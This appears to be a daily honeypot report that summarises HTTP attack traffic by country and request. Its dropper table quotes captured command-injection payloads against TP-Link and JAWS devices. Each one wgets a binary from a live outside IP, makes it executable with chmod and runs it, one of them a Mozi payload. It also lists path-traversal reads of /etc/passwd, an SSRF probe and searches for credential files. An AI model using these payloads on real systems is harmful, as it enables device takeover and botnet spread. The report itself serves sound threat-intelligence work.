Daily Report: 2025-05-06#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 5 stage 1 IP address(es), linked to 5 dropper URL(s).
There are 145 new requests that have never been observed before (these were added to the monitored request database.).
A total of 1355 requests were recorded during the day, originating from 5 different countries, with a peak of 431 requests coming from NL.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
US | Germany |
SG | Germany |
SG | Germany |
US | Germany |
SG | Germany |
US | Dubai |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
45.95.147.209 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sh%3B+wget+http%3A%2F%2F176.65.148.234%2Fsh%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh%60) HTTP/1.1 |
103.77.42.36 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 |
141.98.11.137 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F51.38.137.115%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1 |
185.218.84.39 | GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+drea4+arm7;wget+http:/\x5C/176.65.144.76/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\x5C/176.65.144.76/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.1 |
196.251.72.142 | GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/italianbrainrot/g4za.x86;chmod+777+g4za.x86;./g4za.x86+jawsbg;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/italianbrainrot/g4za.arm7;chmod+777+g4za.arm7;./g4za.arm7+jawsbg HTTP/1.1 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
62 | 4 | POST /goform/webLogin HTTP/1.1 |
178 | 2 | GET /.env.temp HTTP/1.1 |
179 | 2 | GET /.env_ HTTP/1.1 |
180 | 2 | POST /wp-admin/admin-ajax.php HTTP/1.1 |
191 | 1 | \x03\x00\x00.)\xE0\x00\x00\x00\x00\x00Cookie: mstshash=EBWYXZBE |
198 | 1 | GET /Backend/test HTTP/1.1 |
205 | 1 | CONNECT www.naver.com:443 HTTP/1.1 |
212 | 1 | GET /src.7z HTTP/1.1 |
213 | 1 | GET /bin.7z HTTP/1.1 |
214 | 1 | GET /html.7z HTTP/1.1 |
215 | 1 | GET /www.7z HTTP/1.1 |
216 | 1 | GET /web.7z HTTP/1.1 |
217 | 1 | GET /backup.7z HTTP/1.1 |
218 | 1 | GET /xxx.xxx.xxx.xxx.rar HTTP/1.1 |
219 | 1 | GET /old.rar HTTP/1.1 |
220 | 1 | GET /data.rar HTTP/1.1 |
221 | 1 | GET /upload.rar HTTP/1.1 |
222 | 1 | GET /bin/bin.rar HTTP/1.1 |
223 | 1 | GET /web.config.rar HTTP/1.1 |
224 | 1 | GET /portal.rar HTTP/1.1 |
225 | 1 | GET /source.rar HTTP/1.1 |
226 | 1 | GET /src.rar HTTP/1.1 |
228 | 1 | GET /portal.tar HTTP/1.1 |
229 | 1 | GET /source.tar HTTP/1.1 |
230 | 1 | GET /src.tar HTTP/1.1 |
231 | 1 | GET /bin.tar HTTP/1.1 |
232 | 1 | GET /html.tar HTTP/1.1 |
234 | 1 | GET /web.tar HTTP/1.1 |
236 | 1 | GET /xxx.xxx.xxx.xxx.7z HTTP/1.1 |
237 | 1 | GET /old.7z HTTP/1.1 |
238 | 1 | GET /data.7z HTTP/1.1 |
239 | 1 | GET /upload.7z HTTP/1.1 |
240 | 1 | GET /bin/bin.7z HTTP/1.1 |
241 | 1 | GET /web.config.7z HTTP/1.1 |
242 | 1 | GET /portal.7z HTTP/1.1 |
243 | 1 | GET /source.7z HTTP/1.1 |
244 | 1 | GET /bin/bin.gz HTTP/1.1 |
245 | 1 | GET /web.config.gz HTTP/1.1 |
246 | 1 | GET /portal.gz HTTP/1.1 |
247 | 1 | GET /source.gz HTTP/1.1 |
248 | 1 | GET /src.gz HTTP/1.1 |
249 | 1 | GET /bin.gz HTTP/1.1 |
250 | 1 | GET /html.gz HTTP/1.1 |
251 | 1 | GET /www.gz HTTP/1.1 |
252 | 1 | GET /web.gz HTTP/1.1 |
253 | 1 | GET /backup.gz HTTP/1.1 |
254 | 1 | GET /xxx.xxx.xxx.xxx.tar HTTP/1.1 |
255 | 1 | GET /old.tar HTTP/1.1 |
256 | 1 | GET /data.tar HTTP/1.1 |
257 | 1 | GET /upload.tar HTTP/1.1 |
258 | 1 | GET /bin/bin.tar HTTP/1.1 |
259 | 1 | GET /web.config.tar HTTP/1.1 |
260 | 1 | GET /data.tar.gz HTTP/1.1 |
261 | 1 | GET /upload.tar.gz HTTP/1.1 |
262 | 1 | GET /bin/bin.tar.gz HTTP/1.1 |
263 | 1 | GET /web.config.tar.gz HTTP/1.1 |
264 | 1 | GET /portal.tar.gz HTTP/1.1 |
265 | 1 | GET /source.tar.gz HTTP/1.1 |
266 | 1 | GET /src.tar.gz HTTP/1.1 |
267 | 1 | GET /bin.tar.gz HTTP/1.1 |
268 | 1 | GET /html.tar.gz HTTP/1.1 |
269 | 1 | GET /www.tar.gz HTTP/1.1 |
270 | 1 | GET /web.tar.gz HTTP/1.1 |
272 | 1 | GET /xxx.xxx.xxx.xxx.gz HTTP/1.1 |
273 | 1 | GET /old.gz HTTP/1.1 |
274 | 1 | GET /data.gz HTTP/1.1 |
275 | 1 | GET /upload.gz HTTP/1.1 |
276 | 1 | POST /clients/MyCRL HTTP/1.1 |
277 | 1 | GET /classes/common/busiFacade.php HTTP/1.1 |
278 | 1 | GET /render/info.html HTTP/1.1 |
279 | 1 | GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 |
280 | 1 | GET /access/set?param=enableapi&value=1 HTTP/1.1 |
281 | 1 | GET /cslu/v1/scheduler/jobs HTTP/1.1 |
282 | 1 | POST /task/submit/ HTTP/1.1 |
283 | 1 | GET /filex/read-raw?url=http://oast.me&cut=1 HTTP/1.1 |
284 | 1 | GET /file=http://oast.pro HTTP/1.1 |
285 | 1 | GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1 |
286 | 1 | POST /index.php/display/status_zigbee HTTP/1.1 |
287 | 1 | GET /api/v1/markdown/link:metadata?link=http://localhost:13042 HTTP/1.1 |
289 | 1 | GET /unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css HTTP/1.1 |
290 | 1 | GET /xxx.xxx.xxx.xxx.tar.gz HTTP/1.1 |
291 | 1 | GET /old.tar.gz HTTP/1.1 |
292 | 1 | \x00\x0E8\xF7\xC2*D2o]L\x00\x00\x00\x00\x00 |
295 | 1 | GET /__screenshot-error?file=/etc/passwd HTTP/1.1 |
296 | 1 | GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1 |
297 | 1 | GET /file=c:%5Cwindows%5Cwin.ini HTTP/1.1 |
298 | 1 | GET /file=/etc/passwd HTTP/1.1 |
299 | 1 | GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27 HTTP/1.1 |
300 | 1 | GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1 |
301 | 1 | POST /classes/common/busiFacade.php HTTP/1.1 |
302 | 1 | GET /php/ztp_gate.php/.js.map HTTP/1.1 |
303 | 1 | GET /interview?i=/etc/passwd HTTP/1.1 |
304 | 1 | GET /device/config HTTP/1.1 |
305 | 1 | GET /system/config_menu.htm HTTP/1.1 |
306 | 1 | GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1 |
307 | 1 | GET /Admin/Admin.aspx HTTP/1.1 |
308 | 1 | GET /bin.rar HTTP/1.1 |
309 | 1 | GET /html.rar HTTP/1.1 |
310 | 1 | GET /www.rar HTTP/1.1 |
311 | 1 | GET /web.rar HTTP/1.1 |
313 | 1 | GET /xxx.xxx.xxx.xxx.zip HTTP/1.1 |
314 | 1 | GET /old.zip HTTP/1.1 |
315 | 1 | GET /data.zip HTTP/1.1 |
316 | 1 | GET /upload.zip HTTP/1.1 |
317 | 1 | GET /bin/bin.zip HTTP/1.1 |
318 | 1 | GET /web.config.zip HTTP/1.1 |
319 | 1 | GET /portal.zip HTTP/1.1 |
320 | 1 | GET /source.zip HTTP/1.1 |
321 | 1 | GET /src.zip HTTP/1.1 |
322 | 1 | GET /bin.zip HTTP/1.1 |
323 | 1 | GET /html.zip HTTP/1.1 |
353 | 1 | GET /www.zip HTTP/1.1 |
354 | 1 | GET /web.zip HTTP/1.1 |
436 | 1 | GET /admin/assets/css/jquery-ui.css HTTP/1.0 |
460 | 1 | POST /api/user/binLookup?time=1746507200284418536 HTTP/1.1 |
461 | 1 | GET /api/bin/440393?time=1746507199789887630 HTTP/1.1 |
462 | 1 | GET /config/index?time=1746506624750874530 HTTP/1.1 |
468 | 1 | \x00\x0E8\xD44\x0C\x95\x9C\xD8\xCCB\x00\x00\x00\x00\x00 |
500 | 1 | GET /.AWS/test HTTP/1.1 |
501 | 1 | GET /.aws/test HTTP/1.1 |
510 | 1 | POST /api/user/binLookup?time=1746507471189537658 HTTP/1.1 |
511 | 1 | GET /api/bin/440393?time=1746507470788211294 HTTP/1.1 |
512 | 1 | GET /config/index?time=1746506740960468304 HTTP/1.1 |
517 | 1 | GET /stage/test HTTP/1.1 |
518 | 1 | GET /config/test HTTP/1.1 |
519 | 1 | GET /twilio/test HTTP/1.1 |
520 | 1 | GET /staging/test HTTP/1.1 |
521 | 1 | GET /server/test HTTP/1.1 |
522 | 1 | GET /media/test HTTP/1.1 |
523 | 1 | GET /crm/test HTTP/1.1 |
524 | 1 | GET /vendor/test HTTP/1.1 |
525 | 1 | GET /app/test HTTP/1.1 |
526 | 1 | GET /admin/test HTTP/1.1 |
527 | 1 | GET /Api/test HTTP/1.1 |
528 | 1 | GET /API/test HTTP/1.1 |
529 | 1 | GET /api/test HTTP/1.1 |
530 | 1 | GET /backend/test HTTP/1.1 |
531 | 1 | GET /.Aws/test HTTP/1.1 |
541 | 1 | GET /Odin/http/call1746559309 HTTP/1.1 |
542 | 1 | GET /OdinHttpCall1746559309 HTTP/1.1 |
543 | 1 | GET /odinhttpcall1746559309 HTTP/1.1 |
551 | 1 | GET /Odin/http/call1746560918 HTTP/1.1 |
552 | 1 | GET /OdinHttpCall1746560918 HTTP/1.1 |
557 | 1 | \x00\x0E8\x92\xE6v\x11P)\x17\x15\x00\x00\x00\x00\x00 |
558 | 1 | GET /odinhttpcall1746560918 HTTP/1.1 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 431 | NL |
1 | 240 | US |
2 | 151 | GB |
3 | 113 | AE |
4 | 111 | CN |
5 | 78 | DE |
6 | 42 | PL |
7 | 18 | SC |
8 | 14 | AZ |
9 | 14 | RU |
10 | 12 | CA |
11 | 12 | IN |
12 | 11 | AO |
13 | 11 | JP |
14 | 11 | IL |
15 | 10 | PT |
16 | 9 | SG |
17 | 8 | GH |
18 | 6 | MD |
19 | 5 | KR |
20 | 5 | BE |
21 | 4 | ID |
22 | 4 | UA |
23 | 4 | BR |
24 | 4 | BG |
25 | 3 | MC |
26 | 3 | HK |
27 | 3 | PK |
28 | 3 | FR |
29 | 3 | IR |
30 | 2 | NG |
31 | 2 | VE |
32 | 1 | MY |
33 | 1 | TH |
34 | 1 | IT |
35 | 1 | TW |
36 | 1 | LT |
37 | 1 | MX |
38 | 1 | ES |
39 | 1 | GE |